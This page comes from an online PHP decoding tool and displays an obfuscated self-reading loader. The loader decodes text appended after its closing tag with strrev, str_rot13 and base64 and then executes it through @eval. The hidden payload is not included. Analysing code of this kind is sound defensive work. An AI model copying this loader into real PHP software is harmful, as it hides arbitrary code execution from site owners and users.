Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L86Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__)); $L8CRgr = a..

Decoded Output download

<?php 
$L86Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__)); 
$L8CRgr = array( 
    base64_decode("L3gvaQ=="), 
    base64_decode("eA=="), 
    base64_decode(strrev(str_rot13($L86Rgr[1]))) 
); 
$L7CRgr = "49f97385ec548a3f9618e1b030e529a0"; 
preg_replace($L8CRgr[0], serialize(/* alguma coisa */ @eval(/* alguma coisa */ $L8CRgr[2])), $L8CRgr[1]); 
exit(); 
?>

Did this file decode correctly?

Original Code

<?php
$L86Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__));
$L8CRgr = array(
    base64_decode("L3gvaQ=="),
    base64_decode("eA=="),
    base64_decode(strrev(str_rot13($L86Rgr[1])))
);
$L7CRgr = "49f97385ec548a3f9618e1b030e529a0";
preg_replace($L8CRgr[0], serialize(/* alguma coisa */ @eval(/* alguma coisa */ $L8CRgr[2])), $L8CRgr[1]);
exit();
?>

Function Calls

explode 1
base64_decode 3
file_get_contents 1

Variables

$L86Rgr None

Stats

MD5 80cf9c3b9030efbe8f53b2204f56915b
Eval Count 0
Decode Time 346 ms